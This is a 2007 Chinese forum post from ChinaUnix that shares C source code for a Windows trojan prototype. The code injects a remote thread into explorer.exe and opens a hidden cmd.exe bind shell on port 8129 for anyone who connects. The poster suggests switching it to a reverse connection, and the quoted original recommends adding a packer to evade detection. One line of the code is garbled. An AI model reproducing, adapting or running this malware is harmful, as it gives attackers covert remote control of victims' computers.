免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
论坛 IT运维 网络技术 网络技术文档中心 一个简单的木马原型基础代码
最近访问板块 发新帖
查看: 843 | 回复: 0
打印 上一主题 下一主题

一个简单的木马原型基础代码 [复制链接]

liuxiqin

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2007-10-03 13:11 |只看该作者 |倒序浏览

因为木马采用了 正向连接模式 所以请大家修改下代码改成反相连接或端口复用的比较好……(不知道说的对不对…… )
原文:
添加上自己的XXX,加上变态的壳,做点小修改,就可以.....
[Copy to clipboard]CODE:
#include
#pragma comment(lib,"ws2_32.lib")
#include
#include
#pragma comment(lib,"Shlwapi.lib")
#include
#include
#include
//参数结构 ;
typedef struct _RemotePara
{
   DWORD dwLoadLibrary;
   DWORD dwFreeLibrary;
   DWORD dwGetProcAddress;
   DWORD dwGetModuleHandle;
   DWORD dwWSAStartup;
   DWORD dwSocket;
   DWORD dwhtons;
   DWORD dwbind;
   DWORD dwlisten;
   DWORD dwaccept;
   DWORD dwsend;
   DWORD dwrecv;
   DWORD dwclosesocket;
   DWORD dwCreateProcessA;
   DWORD dwPeekNamedPipe;
   DWORD dwWriteFile;
   DWORD dwReadFile;
   DWORD dwCloseHandle;
   DWORD dwCreatePipe;
   DWORD dwTerminateProcess;
   DWORD dwMessageBox;
   char strMessageBox[12];
   char winsockDll[16];
   char cmd[10];
   char Buff[4096];
   char telnetmsg[60];
}RemotePara;
// 提升应用级调试权限
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);
  
// 根据进程名称得到进程ID
DWORD GetPidByName(char *szName);
// 远程线程执行体
DWORD __stdcall ThreadProc(RemotePara *Para)
{
WSADATA WSAData;
WORD nVersion;
SOCKET listenSocket;
SOCKET clientSocket;
struct sockaddr_in server_addr;
struct        sockaddr_in client_addr;
int iAddrSize = sizeof(client_addr);
SECURITY_ATTRIBUTES sa;
HANDLE hReadPipe1;
HANDLE hWritePipe1;
HANDLE hReadPipe2;
HANDLE hWritePipe2;
STARTUPINFO si;
PROCESS_INFORMATION ProcessInformation;
unsigned long lBytesRead = 0;
typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);
typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);
typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );
typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);
FARPROC PMessageBoxA;
FARPROC PWSAStartup;
FARPROC PSocket;
FARPROC Phtons;
FARPROC Pbind;
FARPROC Plisten;
FARPROC Paccept;
FARPROC Psend;
FARPROC Precv;
FARPROC Pclosesocket;
FARPROC PCreateProcessA;
FARPROC PPeekNamedPipe;
FARPROC PWriteFile;
FARPROC PReadFile;
FARPROC PCloseHandle;
FARPROC PCreatePipe;
FARPROC PTerminateProcess;
PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary;
PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress;
PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary;
PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle;
LoadLibraryFunc(Para->winsockDll);
PWSAStartup   = (FARPROC)Para->dwWSAStartup;
PSocket       = (FARPROC)Para->dwSocket;
Phtons        = (FARPROC)Para->dwhtons;
Pbind         = (FARPROC)Para->dwbind;
Plisten       = (FARPROC)Para->dwlisten;
Paccept       = (FARPROC)Para->dwaccept;
Psend         = (FARPROC)Para->dwsend;
Precv         = (FARPROC)Para->dwrecv;
Pclosesocket  = (FARPROC)Para->dwclosesocket;
PCreateProcessA    = (FARPROC)Para->dwCreateProcessA;
PPeekNamedPipe     = (FARPROC)Para->dwPeekNamedPipe;
PWriteFile         = (FARPROC)Para->dwWriteFile;
PReadFile          = (FARPROC)Para->dwReadFile;
PCloseHandle       = (FARPROC)Para->dwCloseHandle;
PCreatePipe        = (FARPROC)Para->dwCreatePipe;
PTerminateProcess  = (FARPROC)Para->dwTerminateProcess;
PMessageBoxA       = (FARPROC)Para->dwMessageBox;
nVersion = MAKEWORD(2,1);
PWSAStartup(nVersion, (LPWSADATA)&WSAData);
listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);
if(listenSocket == INVALID_SOCKET)return 0;
server_addr.sin_family      = AF_INET;
server_addr.sin_port        = Phtons((unsigned short)(8129));
server_addr.sin_addr.s_addr = INADDR_ANY;
if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;
if(Plisten(listenSocket, 5))return 0;
clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);
// Psend(clientSocket, Para->telnetmsg, 60, 0);
if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;
if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0;
ZeroMemory(&si,sizeof(si)); //ZeroMemory是C运行库函数,可以直接调用
si.dwFlags     = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput   = hReadPipe2;
si.hStdOutput  = si.hStdError = hWritePipe1;
if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return 0;
while(1) {
  memset(Para->Buff,0,4096);
  PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0);
  if(lBytesRead) {
   if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break;
   if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break;
  }else {
   lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0);
   if(lBytesRead Buff, lBytesRead, &lBytesRead, 0))break;
  }
}
PCloseHandle(hWritePipe2);
PCloseHandle(hReadPipe1);
PCloseHandle(hReadPipe2);
PCloseHandle(hWritePipe1);
Pclosesocket(listenSocket);
Pclosesocket(clientSocket);
// PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK);
return 0;
}
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
const DWORD THREADSIZE=1024*4;
DWORD byte_write;
void *pRemoteThread;
HANDLE hToken,hRemoteProcess,hThread;
HINSTANCE hKernel,hUser32,hSock;
RemotePara myRemotePara,*pRemotePara;
DWORD pID;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);
// 获得指定进程句柄,并设其权限为PROCESS_ALL_ACCESS
pID = GetPidByName("EXPLORER.EXE");
if(pID == 0)return 0;
hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
if(!hRemoteProcess)return 0;
// 在远程进程地址空间分配虚拟内存
pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!pRemoteThread)return 0;
// 将线程执行体ThreadProc写入远程进程
if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0;
ZeroMemory(&myRemotePara,sizeof(RemotePara));
hKernel = LoadLibrary( "kernel32.dll");
myRemotePara.dwLoadLibrary      = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
myRemotePara.dwFreeLibrary      = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
myRemotePara.dwGetProcAddress   = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
myRemotePara.dwGetModuleHandle  = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA");
myRemotePara.dwCreateProcessA     = (DWORD)GetProcAddress(hKernel, "CreateProcessA");
myRemotePara.dwPeekNamedPipe      = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe");
myRemotePara.dwWriteFile          = (DWORD)GetProcAddress(hKernel, "WriteFile");
myRemotePara.dwReadFile           = (DWORD)GetProcAddress(hKernel, "ReadFile");
myRemotePara.dwCloseHandle        = (DWORD)GetProcAddress(hKernel, "CloseHandle");
myRemotePara.dwCreatePipe         = (DWORD)GetProcAddress(hKernel, "CreatePipe");
myRemotePara.dwTerminateProcess   = (DWORD)GetProcAddress(hKernel, "TerminateProcess");
hSock = LoadLibrary("wsock32.dll");
myRemotePara.dwWSAStartup   = (DWORD)GetProcAddress(hSock,"WSAStartup");
myRemotePara.dwSocket       = (DWORD)GetProcAddress(hSock,"socket");
myRemotePara.dwhtons        = (DWORD)GetProcAddress(hSock,"htons");
myRemotePara.dwbind         = (DWORD)GetProcAddress(hSock,"bind");
myRemotePara.dwlisten       = (DWORD)GetProcAddress(hSock,"listen");
myRemotePara.dwaccept       = (DWORD)GetProcAddress(hSock,"accept");
myRemotePara.dwrecv         = (DWORD)GetProcAddress(hSock,"recv");
myRemotePara.dwsend         = (DWORD)GetProcAddress(hSock,"send");
myRemotePara.dwclosesocket  = (DWORD)GetProcAddress(hSock,"closesocket");
hUser32 = LoadLibrary("user32.dll");
myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA");
strcat(myRemotePara.strMessageBox,"Sucess!\\0");
strcat(myRemotePara.winsockDll,"wsock32.dll\\0");
strcat(myRemotePara.cmd,"cmd.exe\\0");
strcat(myRemotePara.telnetmsg,"Connect Sucessful!\\n\\0");
//写进目标进程
pRemotePara =(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);
if(!pRemotePara)return 0;
if(!WriteProcessMemory (hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0;
// 启动线程
hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);
while(1) {}
FreeLibrary(hKernel);
FreeLibrary(hSock);
FreeLibrary(hUser32);
CloseHandle(hRemoteProcess);
CloseHandle(hToken);
return 0;
}
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;
AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
return((GetLastError() == ERROR_SUCCESS));
}
DWORD GetPidByName(char *szName)
{
HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
PROCESSENTRY32 pe32={0};
DWORD dwRet=0;
hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hProcessSnap == INVALID_HANDLE_VALUE)return 0;
pe32.dwSize = sizeof(PROCESSENTRY32);
if(Process32First(hProcessSnap, &pe32))
{
  do
  {
   if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0)
   {
    dwRet=pe32.th32ProcessID;
    break;
   }
  }while (Process32Next(hProcessSnap,&pe32));
}
else return 0;
if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);
return dwRet;
}

本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u1/36708/showart_394229.html
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP